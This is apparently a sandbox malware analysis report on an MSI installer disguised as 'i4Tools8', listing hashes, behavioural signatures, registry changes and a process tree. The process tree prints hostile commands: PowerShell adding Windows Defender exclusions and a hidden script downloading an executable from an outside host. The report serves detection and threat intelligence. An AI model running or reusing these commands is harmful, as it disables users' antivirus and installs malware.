Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
117s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
14/09/2024, 08:11
Static task
static1
Behavioral task
behavioral1
Sample
zuixinaisi.msi
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
zuixinaisi.msi
Resource
win10v2004-20240802-en
General
-
Target
zuixinaisi.msi
-
Size
233.8MB
-
MD5
df0ddca33d18cef60dbfdad992a21ff3
-
SHA1
5db0a225c9713d93412d01c5df5398811e54d1e5
-
SHA256
8e91a24111e14ac5cec2ee91633098ddc8606ee51d13b0c9d0f6087d597a189b
-
SHA512
e217e0425cb0045bc15e4ed5e122e69bd4d6bee5170e961659aba94641305f6a274d648529ec577df41fcca383085cf31e9df66123e433dd2f6a408aa407ceda
-
SSDEEP
6291456:/LGfwiT1I66Fm7gHvhjLvuYGpyLit5vFls1D:/cT1I6CFbopyLiLvyD
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 1664 WScript.exe 4 1664 WScript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2848 powershell.exe 2896 powershell.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\V: msiexec.exe -
Drops file in Windows directory 14 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI697.tmp msiexec.exe File created C:\Windows\Installer\f770551.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI90A.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.ev1 DrvInst.exe File created C:\Windows\Installer\f77054e.msi msiexec.exe File opened for modification C:\Windows\Installer\f77054e.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI714.tmp msiexec.exe File created C:\Windows\Installer\f770553.msi msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI8E9.tmp msiexec.exe File opened for modification C:\Windows\Installer\f770551.ipi msiexec.exe File opened for modification C:\Windows\INF\setupapi.ev3 DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\MSI609.tmp msiexec.exe -
Executes dropped EXE 1 IoCs
pid Process 2736 MSI90A.tmp -
Loads dropped DLL 3 IoCs
pid Process 1688 MsiExec.exe 1688 MsiExec.exe 1688 MsiExec.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 2736 MSI90A.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid Process 1352 msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSI90A.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Modifies data under HKEY_USERS 46 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E msiexec.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D msiexec.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe -
Modifies registry class 23 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\59E1E2E8EE5E9104BB112893D1C94ADB msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\ProductName = "i4Tools8" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\DeploymentFlags = "3" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C1B40AE142F817A4388DE97327B1C387\59E1E2E8EE5E9104BB112893D1C94ADB msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\PackageCode = "D28B5C34E3416EF469BDECBAE57D671B" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Version = "16777216" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\AuthorizedLUAApp = "0" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\C1B40AE142F817A4388DE97327B1C387 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\PackageName = "zuixinaisi.msi" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Media\DiskPrompt = "[1]" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Media\1 = ";" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\59E1E2E8EE5E9104BB112893D1C94ADB\MainFeature msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\Language = "2052" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\59E1E2E8EE5E9104BB112893D1C94ADB\SourceList\Media msiexec.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2288 msiexec.exe 2288 msiexec.exe 2848 powershell.exe 2896 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1396 cmd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1352 msiexec.exe Token: SeIncreaseQuotaPrivilege 1352 msiexec.exe Token: SeRestorePrivilege 2288 msiexec.exe Token: SeTakeOwnershipPrivilege 2288 msiexec.exe Token: SeSecurityPrivilege 2288 msiexec.exe Token: SeCreateTokenPrivilege 1352 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 1352 msiexec.exe Token: SeLockMemoryPrivilege 1352 msiexec.exe Token: SeIncreaseQuotaPrivilege 1352 msiexec.exe Token: SeMachineAccountPrivilege 1352 msiexec.exe Token: SeTcbPrivilege 1352 msiexec.exe Token: SeSecurityPrivilege 1352 msiexec.exe Token: SeTakeOwnershipPrivilege 1352 msiexec.exe Token: SeLoadDriverPrivilege 1352 msiexec.exe Token: SeSystemProfilePrivilege 1352 msiexec.exe Token: SeSystemtimePrivilege 1352 msiexec.exe Token: SeProfSingleProcessPrivilege 1352 msiexec.exe Token: SeIncBasePriorityPrivilege 1352 msiexec.exe Token: SeCreatePagefilePrivilege 1352 msiexec.exe Token: SeCreatePermanentPrivilege 1352 msiexec.exe Token: SeBackupPrivilege 1352 msiexec.exe Token: SeRestorePrivilege 1352 msiexec.exe Token: SeShutdownPrivilege 1352 msiexec.exe Token: SeDebugPrivilege 1352 msiexec.exe Token: SeAuditPrivilege 1352 msiexec.exe Token: SeSystemEnvironmentPrivilege 1352 msiexec.exe Token: SeChangeNotifyPrivilege 1352 msiexec.exe Token: SeRemoteShutdownPrivilege 1352 msiexec.exe Token: SeUndockPrivilege 1352 msiexec.exe Token: SeSyncAgentPrivilege 1352 msiexec.exe Token: SeEnableDelegationPrivilege 1352 msiexec.exe Token: SeManageVolumePrivilege 1352 msiexec.exe Token: SeImpersonatePrivilege 1352 msiexec.exe Token: SeCreateGlobalPrivilege 1352 msiexec.exe Token: SeBackupPrivilege 2356 vssvc.exe Token: SeRestorePrivilege 2356 vssvc.exe Token: SeAuditPrivilege 2356 vssvc.exe Token: SeBackupPrivilege 2288 msiexec.exe Token: SeRestorePrivilege 2288 msiexec.exe Token: SeRestorePrivilege 2832 DrvInst.exe Token: SeRestorePrivilege 2832 DrvInst.exe Token: SeRestorePrivilege 2832 DrvInst.exe Token: SeRestorePrivilege 2832 DrvInst.exe Token: SeRestorePrivilege 2832 DrvInst.exe Token: SeRestorePrivilege 2832 DrvInst.exe Token: SeRestorePrivilege 2832 DrvInst.exe Token: SeLoadDriverPrivilege 2832 DrvInst.exe Token: SeLoadDriverPrivilege 2832 DrvInst.exe Token: SeLoadDriverPrivilege 2832 DrvInst.exe Token: SeRestorePrivilege 2288 msiexec.exe Token: SeTakeOwnershipPrivilege 2288 msiexec.exe Token: SeRestorePrivilege 2288 msiexec.exe Token: SeTakeOwnershipPrivilege 2288 msiexec.exe Token: SeRestorePrivilege 2288 msiexec.exe Token: SeTakeOwnershipPrivilege 2288 msiexec.exe Token: SeRestorePrivilege 2288 msiexec.exe Token: SeTakeOwnershipPrivilege 2288 msiexec.exe Token: SeRestorePrivilege 2288 msiexec.exe Token: SeTakeOwnershipPrivilege 2288 msiexec.exe Token: SeRestorePrivilege 2288 msiexec.exe Token: SeTakeOwnershipPrivilege 2288 msiexec.exe Token: SeRestorePrivilege 2288 msiexec.exe Token: SeTakeOwnershipPrivilege 2288 msiexec.exe Token: SeDebugPrivilege 2848 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1352 msiexec.exe 1352 msiexec.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 2288 wrote to memory of 1688 2288 msiexec.exe 35 PID 2288 wrote to memory of 1688 2288 msiexec.exe 35 PID 2288 wrote to memory of 1688 2288 msiexec.exe 35 PID 2288 wrote to memory of 1688 2288 msiexec.exe 35 PID 2288 wrote to memory of 1688 2288 msiexec.exe 35 PID 2288 wrote to memory of 1688 2288 msiexec.exe 35 PID 2288 wrote to memory of 1688 2288 msiexec.exe 35 PID 2288 wrote to memory of 2736 2288 msiexec.exe 36 PID 2288 wrote to memory of 2736 2288 msiexec.exe 36 PID 2288 wrote to memory of 2736 2288 msiexec.exe 36 PID 2288 wrote to memory of 2736 2288 msiexec.exe 36 PID 2288 wrote to memory of 2736 2288 msiexec.exe 36 PID 2288 wrote to memory of 2736 2288 msiexec.exe 36 PID 2288 wrote to memory of 2736 2288 msiexec.exe 36 PID 2736 wrote to memory of 1396 2736 MSI90A.tmp 37 PID 2736 wrote to memory of 1396 2736 MSI90A.tmp 37 PID 2736 wrote to memory of 1396 2736 MSI90A.tmp 37 PID 2736 wrote to memory of 1396 2736 MSI90A.tmp 37 PID 1396 wrote to memory of 2848 1396 cmd.exe 39 PID 1396 wrote to memory of 2848 1396 cmd.exe 39 PID 1396 wrote to memory of 2848 1396 cmd.exe 39 PID 1396 wrote to memory of 2848 1396 cmd.exe 39 PID 1396 wrote to memory of 2896 1396 cmd.exe 40 PID 1396 wrote to memory of 2896 1396 cmd.exe 40 PID 1396 wrote to memory of 2896 1396 cmd.exe 40 PID 1396 wrote to memory of 2896 1396 cmd.exe 40 PID 1396 wrote to memory of 1664 1396 cmd.exe 41 PID 1396 wrote to memory of 1664 1396 cmd.exe 41 PID 1396 wrote to memory of 1664 1396 cmd.exe 41 PID 1396 wrote to memory of 1664 1396 cmd.exe 41 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\zuixinaisi.msi1⤵
- Enumerates connected drives
- Event Triggered Execution: Installer Packages
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1352
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2288 -
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AD8581B124C124DB56D9C7C26E5E0FD42⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1688
-
-
C:\Windows\Installer\MSI90A.tmp"C:\Windows\Installer\MSI90A.tmp" /DontWait /RunAsAdmin /HideWindow "C:\ProgramData\i4Tools8.bat"2⤵
- Executes dropped EXE
- Access Token Manipulation: Create Process with Token
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2736 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ""C:\ProgramData\i4Tools8.bat" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\ProgramData/instai.exe4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2848
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\ProgramData4⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2896
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\DownloadFile.vbs" "https://vipusfsk.com/instai.exe" "C:/ProgramData\instai.exe"4⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
PID:1664
-
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "000000000000005C" "0000000000000498"1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2832
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Access Token Manipulation
1Create Process with Token
1Event Triggered Execution
1Installer Packages
1Defense Evasion
Access Token Manipulation
1Create Process with Token
1System Binary Proxy Execution
1Msiexec
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD51614f750432e0505390bd55758007ed8
SHA1cb86d7c425a2ac68b0570a0a05328956920a5a83
SHA256faf23b8710f4ab7ffee3831cafb14e93d24917b493d366b7d15a6311710e73c1
SHA512f6c3a8aafed58a75248a9040bad3977d9a0b65c3758b36777ada8351993a156e79fb9ca599aa27772efdeeeb1e182ec0680693e7e9646c2a207714bbe8900375
-
Filesize
407B
MD52ff09853906bcaed82ddb57baca8eb1f
SHA195bf628e54a9eff2ac434fedc78193846def0139
SHA256591a03bf9ca7daa56aa6fec2e008a9a5aa68bb4f9f25ae23f905ab79de23d795
SHA512b6e7a58de13e6a3d760e769183921cc3658398c405d39f19cb4d26ab03b6898f3cf011391f1aaa9db9358d40131bd67e7a7df46cc8ff4298e4641232a078d740
-
Filesize
1KB
MD510e4067312ac3173043783d46c328a99
SHA1ec03017d71370619f553cd77b615ef6e2c781ff3
SHA256048183e68c0f8526ad8ce2e0c61ecbe50f42eacf990e8e4026254b154d0ba4bf
SHA5121f7799c14386c8bf3e65146f543e96052e809a55df9431b8b5baaef677218f870d35d963ef71f17cdfeb773f418a7e9a96ac68c851929ecd7a25e32954e35cd3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5d0f962880d50303626a08a7e3d05e83b
SHA109fc519b1fcbc9435924c5a400e12e900398a800
SHA256db1ba89fcc308f8495c3bdca253e02e657875729db7345a9197cdf18bf542694
SHA51250f7061a6d99a33e43298823176783020a028569895381eb6e8a26d4993f50de85bb3e956cb73f0b9e7353fb6429ed0be21d507c8f0e707a98c36ea888bf231d
-
Filesize
587KB
MD5c7fbd5ee98e32a77edf1156db3fca622
SHA13e534fc55882e9fb940c9ae81e6f8a92a07125a0
SHA256e140990b509dd6884a5742bde64f2cdaa10012d472b0b32de43ebecbc83242b6
SHA5128691ac8b214cc1e4f34a3ab2bbc0c2391f7f11ebbe5db0dc82825195b5fe5a05310ed1e14d253a9b74a64050d2f2a6623dd2fcd912f80fef51e51845ef1e3a1a
-
Filesize
419KB
MD5cac0eaeb267d81cf3fa968ee23a6af9d
SHA1cf6ae8e44fb4949d5f0b01b110eaba49d39270a2
SHA256f1dd0dd1e83b28ffa2ed30f46f98e94a4919ec1f4e9d33720354288b77153774
SHA5128edf9f733dda9000a6e2b70da61912dbc15f74c836d738391ceddcdff20f5b420a678450523cf331aa9bce90217aa92ac6e73d1880ae15c9842ccc7d3296f95b